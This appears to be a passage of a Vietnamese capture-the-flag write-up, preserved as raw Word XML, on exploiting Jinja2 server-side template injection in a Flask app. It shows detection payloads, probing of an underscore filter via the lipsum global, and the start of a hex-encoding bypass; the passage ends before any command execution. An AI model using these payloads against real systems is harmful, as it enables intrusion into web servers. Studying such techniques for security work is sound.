          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:color w:val="C9D1D9"/>
        </w:rPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="644"/>
        </w:tabs>
        <w:spacing w:before="149" w:after="268" w:lineRule="auto" w:line="241"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="462" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:wordWrap w:val="false"/>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="196"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:color w:val="C9D1D9"/>
        </w:rPr>
        <w:t>Node.js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+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Express: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có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reverse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proxy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phía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trước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Flask</w:t>
      </w:r>
      <w:bookmarkEnd w:id="196"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:color w:val="C9D1D9"/>
        </w:rPr>
        <w:spacing w:before="269" w:after="0" w:lineRule="auto" w:line="240"/>
        <w:ind w:left="182" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:wordWrap w:val="false"/>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="197"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:color w:val="C9D1D9"/>
        </w:rPr>
        <w:t>Flask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template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engine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đây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dấu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hiệu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rõ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ràng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nhắm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tới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SSTI.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19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98"/>
      <w:bookmarkEnd w:id="19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199"/>
      <w:bookmarkEnd w:id="199"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="6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00"/>
      <w:bookmarkEnd w:id="200"/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7" w:after="364" w:lineRule="auto" w:line="240"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="182" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:wordWrap w:val="false"/>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="201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Xác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nhận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SSTI</w:t>
      </w:r>
      <w:bookmarkEnd w:id="201"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:color w:val="C9D1D9"/>
        </w:rPr>
        <w:spacing w:before="364" w:after="0" w:lineRule="auto" w:line="241"/>
        <w:ind w:left="182" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:wordWrap w:val="false"/>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="202"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:color w:val="C9D1D9"/>
        </w:rPr>
        <w:t>Thử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các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payload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định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danh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SSTI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cơ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bản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vào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input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field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của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ứng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dụng:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20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-116205</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5981065" cy="13335"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="203" name="Image 2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9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510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204"/>
      <w:bookmarkEnd w:id="204"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="91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205"/>
      <w:bookmarkEnd w:id="205"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:b w:val="true"/>
          <w:color w:val="FF4757"/>
        </w:rPr>
        <w:spacing w:before="92" w:after="144" w:lineRule="auto" w:line="240"/>
        <w:ind w:left="182" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:wordWrap w:val="false"/>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="206"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:b w:val="true"/>
          <w:color w:val="FF4757"/>
        </w:rPr>
        <w:t>Payload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1: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{{7*7}}</w:t>
      </w:r>
      <w:bookmarkEnd w:id="206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144" w:after="212" w:lineRule="auto" w:line="241"/>
        <w:ind w:left="382" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:wordWrap w:val="false"/>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="207"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:color w:val="79C0FF"/>
        </w:rPr>
        <w:t>{{7*7}}</w:t>
      </w:r>
      <w:bookmarkEnd w:id="207"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:color w:val="C9D1D9"/>
        </w:rPr>
        <w:spacing w:before="213" w:after="0" w:lineRule="auto" w:line="240"/>
        <w:ind w:left="182" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:wordWrap w:val="false"/>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="208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Output: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49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✓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—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Template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engine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đang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evaluate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expression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c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:color w:val="C9D1D9"/>
        </w:rPr>
        <w:t>ủ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:hAnsi="MS Gothic" w:eastAsia="MS Gothic" w:cs="MS Gothic"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:color w:val="C9D1D9"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:hAnsi="MS Gothic" w:eastAsia="MS Gothic" w:cs="MS Gothic"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:color w:val="C9D1D9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:hAnsi="MS Gothic" w:eastAsia="MS Gothic" w:cs="MS Gothic"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:color w:val="C9D1D9"/>
        </w:rPr>
        <w:t>mình.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20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09"/>
      <w:bookmarkEnd w:id="209"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="11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10"/>
      <w:bookmarkEnd w:id="210"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:b w:val="true"/>
          <w:color w:val="FF4757"/>
        </w:rPr>
        <w:spacing w:before="116" w:after="148" w:lineRule="auto" w:line="240"/>
        <w:ind w:left="182" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:wordWrap w:val="false"/>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="211"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:b w:val="true"/>
          <w:color w:val="FF4757"/>
        </w:rPr>
        <w:t>Payload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2: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{{7*'7'}}</w:t>
      </w:r>
      <w:bookmarkEnd w:id="211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148" w:after="0" w:lineRule="auto" w:line="234"/>
        <w:ind w:left="382" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:wordWrap w:val="false"/>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="212"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:color w:val="79C0FF"/>
        </w:rPr>
        <w:t>{{7*'7'}}</w:t>
      </w:r>
      <w:bookmarkEnd w:id="212"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="1" w:after="57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213"/>
      <w:bookmarkEnd w:id="213"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:color w:val="C9D1D9"/>
        </w:rPr>
        <w:spacing w:before="57" w:after="0" w:lineRule="auto" w:line="240"/>
        <w:ind w:left="182" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:wordWrap w:val="false"/>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="214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Output: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7777777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rFonts w:ascii="Wingdings 2" w:hAnsi="Wingdings 2" w:eastAsia="Wingdings 2" w:cs="Wingdings 2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:color w:val="C9D1D9"/>
        </w:rPr>
        <w:sym w:font="Wingdings 2" w:char="F050"/>
      </w:r>
      <w:bookmarkEnd w:id="214"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="1" w:after="9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15"/>
      <w:bookmarkEnd w:id="215"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:color w:val="C9D1D9"/>
        </w:rPr>
        <w:spacing w:before="95" w:after="0" w:lineRule="auto" w:line="337"/>
        <w:ind w:left="182" w:right="195" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="216"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:color w:val="C9D1D9"/>
        </w:rPr>
        <w:t>Kết</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5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quả</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="52"/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7777777</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="52"/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đặc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trưng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của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(Python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nhân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int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với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string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repeat).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Nếu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51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Twig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(PHP)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thì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sẽ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ra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49.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Từ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đây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xác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định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chắc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chắn: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đây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Jinja2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SSTI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:color w:val="C9D1D9"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:color w:val="C9D1D9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="21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17"/>
      <w:bookmarkEnd w:id="217"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="12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18"/>
      <w:bookmarkEnd w:id="218"/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126" w:after="0" w:lineRule="auto" w:line="240"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="182" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:wordWrap w:val="false"/>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="219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Phân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tích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Filter</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21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20"/>
      <w:bookmarkEnd w:id="2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114935</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5981065" cy="13335"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="221" name="Image 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9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510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22"/>
      <w:bookmarkEnd w:id="22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23"/>
      <w:bookmarkEnd w:id="22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24"/>
      <w:bookmarkEnd w:id="224"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="4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25"/>
      <w:bookmarkEnd w:id="225"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:color w:val="8B949E"/>
        </w:rPr>
        <w:spacing w:before="40" w:after="0" w:lineRule="auto" w:line="234"/>
        <w:ind w:left="2619" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:wordWrap w:val="false"/>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="226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3</w:t>
      </w:r>
      <w:bookmarkEnd w:id="226"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:sectPr>
          <w:headerReference r:id="rId11" w:type="default"/>
          <w:footerReference r:id="rId12" w:type="default"/>
          <w:pgSz w:w="11906" w:h="16838" w:orient="portrait"/>
          <w:pgMar w:right="1071" w:left="1071" w:top="1431" w:bottom="238" w:header="0" w:footer="0" w:gutter="0"/>
          <w:cols w:space="425"/>
          <w:textDirection w:val="lrTb"/>
          <w:type w:val="continuous"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:color w:val="C9D1D9"/>
        </w:rPr>
        <w:spacing w:before="0" w:after="296" w:lineRule="auto" w:line="241"/>
        <w:ind w:left="182" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:wordWrap w:val="false"/>
      </w:pPr>
      <w:bookmarkStart w:name="240"/>
      <w:bookmarkEnd w:id="240"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:color w:val="C9D1D9"/>
        </w:rPr>
        <w:t>Thử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payload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khai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thác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chuẩn,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tất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cả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đều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nhận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được:</w:t>
      </w:r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296" w:after="0" w:lineRule="auto" w:line="234"/>
        <w:ind w:left="382" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:wordWrap w:val="false"/>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="241"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:color w:val="79C0FF"/>
        </w:rPr>
        <w:t>Nice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try,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but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that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input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is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not</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:spacing w:val="-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allowed!</w:t>
      </w:r>
      <w:bookmarkEnd w:id="241"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="1" w:after="0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242"/>
      <w:bookmarkEnd w:id="242"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="7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243"/>
      <w:bookmarkEnd w:id="243"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:color w:val="C9D1D9"/>
        </w:rPr>
        <w:spacing w:before="7" w:after="0" w:lineRule="auto" w:line="241"/>
        <w:ind w:left="182" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:wordWrap w:val="false"/>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="244"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:color w:val="C9D1D9"/>
        </w:rPr>
        <w:t>Filter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đang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chặn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gì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đó.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Bắt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đầu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test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từng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thành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phần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hẹp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phạm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vi.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24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45"/>
      <w:bookmarkEnd w:id="245"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="91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46"/>
      <w:bookmarkEnd w:id="246"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:b w:val="true"/>
          <w:color w:val="FF4757"/>
        </w:rPr>
        <w:spacing w:before="92" w:after="148" w:lineRule="auto" w:line="240"/>
        <w:ind w:left="182" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:wordWrap w:val="false"/>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="247"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:b w:val="true"/>
          <w:color w:val="FF4757"/>
        </w:rPr>
        <w:t>4.1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Test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lipsum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global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—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PASS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="247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148" w:after="0" w:lineRule="auto" w:line="234"/>
        <w:ind w:left="382" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:wordWrap w:val="false"/>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="248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{{lipsum}}</w:t>
      </w:r>
      <w:bookmarkEnd w:id="248"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="57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249"/>
      <w:bookmarkEnd w:id="249"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:color w:val="C9D1D9"/>
        </w:rPr>
        <w:spacing w:before="57" w:after="0" w:lineRule="auto" w:line="241"/>
        <w:ind w:left="182" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:wordWrap w:val="false"/>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="250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PASS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Trả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về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object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lipsum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bình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thường:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25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1"/>
      <w:bookmarkEnd w:id="25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2"/>
      <w:bookmarkEnd w:id="25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3"/>
      <w:bookmarkEnd w:id="25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4"/>
      <w:bookmarkEnd w:id="25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5"/>
      <w:bookmarkEnd w:id="25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6"/>
      <w:bookmarkEnd w:id="25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7"/>
      <w:bookmarkEnd w:id="25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8"/>
      <w:bookmarkEnd w:id="25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59"/>
      <w:bookmarkEnd w:id="25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0"/>
      <w:bookmarkEnd w:id="26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1"/>
      <w:bookmarkEnd w:id="26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2"/>
      <w:bookmarkEnd w:id="26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3"/>
      <w:bookmarkEnd w:id="26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4"/>
      <w:bookmarkEnd w:id="26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5"/>
      <w:bookmarkEnd w:id="26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6"/>
      <w:bookmarkEnd w:id="26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7"/>
      <w:bookmarkEnd w:id="26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8"/>
      <w:bookmarkEnd w:id="26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69"/>
      <w:bookmarkEnd w:id="26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70"/>
      <w:bookmarkEnd w:id="27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71"/>
      <w:bookmarkEnd w:id="271"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="21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72"/>
      <w:bookmarkEnd w:id="272"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:color w:val="8B949E"/>
        </w:rPr>
        <w:spacing w:before="22" w:after="0" w:lineRule="auto" w:line="241"/>
        <w:ind w:left="3421" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:wordWrap w:val="false"/>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="273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3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lipsum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hoạt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động,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trả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về</w:t>
      </w:r>
      <w:bookmarkEnd w:id="273"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:lineRule="auto" w:line="203"/>
        <w:ind w:left="3421" w:right="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:wordWrap w:val="false"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="274"/>
      <w:bookmarkEnd w:id="274"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:lineRule="auto" w:line="203"/>
        <w:ind w:left="3421" w:right="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:wordWrap w:val="false"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="275"/>
      <w:bookmarkEnd w:id="275"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="1" w:after="22" w:lineRule="auto" w:line="203"/>
        <w:ind w:left="3421" w:right="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:wordWrap w:val="false"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="276"/>
      <w:bookmarkEnd w:id="276"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:b w:val="true"/>
          <w:color w:val="FF4757"/>
        </w:rPr>
        <w:spacing w:before="23" w:after="148" w:lineRule="auto" w:line="240"/>
        <w:ind w:left="182" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:wordWrap w:val="false"/>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="277"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:b w:val="true"/>
          <w:color w:val="FF4757"/>
        </w:rPr>
        <w:t>4.2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Test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dấu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underscore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(_)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—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BLOCKED</w:t>
      </w:r>
      <w:bookmarkEnd w:id="277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tabs>
          <w:tab w:val="left" w:pos="1509"/>
          <w:tab w:val="left" w:pos="2430"/>
        </w:tabs>
        <w:spacing w:before="148" w:after="0" w:lineRule="auto" w:line="234"/>
        <w:ind w:left="382" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:wordWrap w:val="false"/>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="278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{{lipsum.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:color w:val="79C0FF"/>
          <w:u w:val="single" w:color="00000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0"/>
          <w:u w:val="single" w:color="000000"/>
        </w:rPr>
        <w:tab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globals</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:color w:val="79C0FF"/>
          <w:u w:val="single" w:color="00000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0"/>
          <w:u w:val="single" w:color="000000"/>
        </w:rPr>
        <w:tab/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}}</w:t>
      </w:r>
      <w:bookmarkEnd w:id="278"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="57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279"/>
      <w:bookmarkEnd w:id="279"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:color w:val="C9D1D9"/>
        </w:rPr>
        <w:spacing w:before="57" w:after="0" w:lineRule="auto" w:line="241"/>
        <w:ind w:left="182" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:wordWrap w:val="false"/>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="280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BLOCKED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lập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tức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bị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chặn.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="280"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="9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81"/>
      <w:bookmarkEnd w:id="281"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:color w:val="C9D1D9"/>
        </w:rPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5047"/>
          <w:tab w:val="left" w:pos="8106"/>
        </w:tabs>
        <w:spacing w:before="95" w:after="0" w:lineRule="auto" w:line="337"/>
        <w:ind w:left="182" w:right="195" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="282"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:color w:val="C9D1D9"/>
        </w:rPr>
        <w:t>Kết</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="58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luận:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="58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pacing w:val="58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đang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chặn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ký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tự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dấu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gạch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dưới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  <w:u w:val="single" w:color="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="0"/>
          <w:u w:val="single" w:color="000000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:color w:val="C9D1D9"/>
        </w:rPr>
        <w:t>(underscore).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Đây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kỹ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thuật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phổ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biến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vì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hầu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hết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các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magic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attribute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của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Python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đều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bắt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5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đầu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và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kết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thúc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bằng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dấu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5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  <w:u w:val="single" w:color="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="0"/>
          <w:u w:val="single" w:color="000000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:color w:val="C9D1D9"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:color w:val="C9D1D9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="28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83"/>
      <w:bookmarkEnd w:id="283"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="125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84"/>
      <w:bookmarkEnd w:id="284"/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126" w:after="406" w:lineRule="auto" w:line="240"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="182" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:wordWrap w:val="false"/>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="285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Bypass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Filter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—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Từng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Bước</w:t>
      </w:r>
      <w:bookmarkEnd w:id="285"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:b w:val="true"/>
          <w:color w:val="FF4757"/>
        </w:rPr>
        <w:spacing w:before="407" w:after="119" w:lineRule="auto" w:line="240"/>
        <w:ind w:left="182" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:wordWrap w:val="false"/>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="286"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:b w:val="true"/>
          <w:color w:val="FF4757"/>
        </w:rPr>
        <w:t>Bước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1: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Bypass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underscore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bằng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hex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encoding</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28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-142875</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5981065" cy="13335"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="287" name="Image 2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11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573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sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:color w:val="C9D1D9"/>
        </w:rPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7670"/>
        </w:tabs>
        <w:spacing w:before="119" w:after="197" w:lineRule="auto" w:line="337"/>
        <w:ind w:left="182" w:right="195" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="288"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:color w:val="C9D1D9"/>
        </w:rPr>
        <w:t>Jinja2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hỗ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trợ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Unicode/hex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escape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trong</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="93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string</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9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literals.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9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Ký</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9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tự</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9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underscore</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="92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  <w:u w:val="single" w:color="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="0"/>
          <w:u w:val="single" w:color="000000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:color w:val="C9D1D9"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="39"/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\x5f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="39"/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color w:val="C9D1D9"/>
        </w:rPr>
        <w:t>trong</w:t>
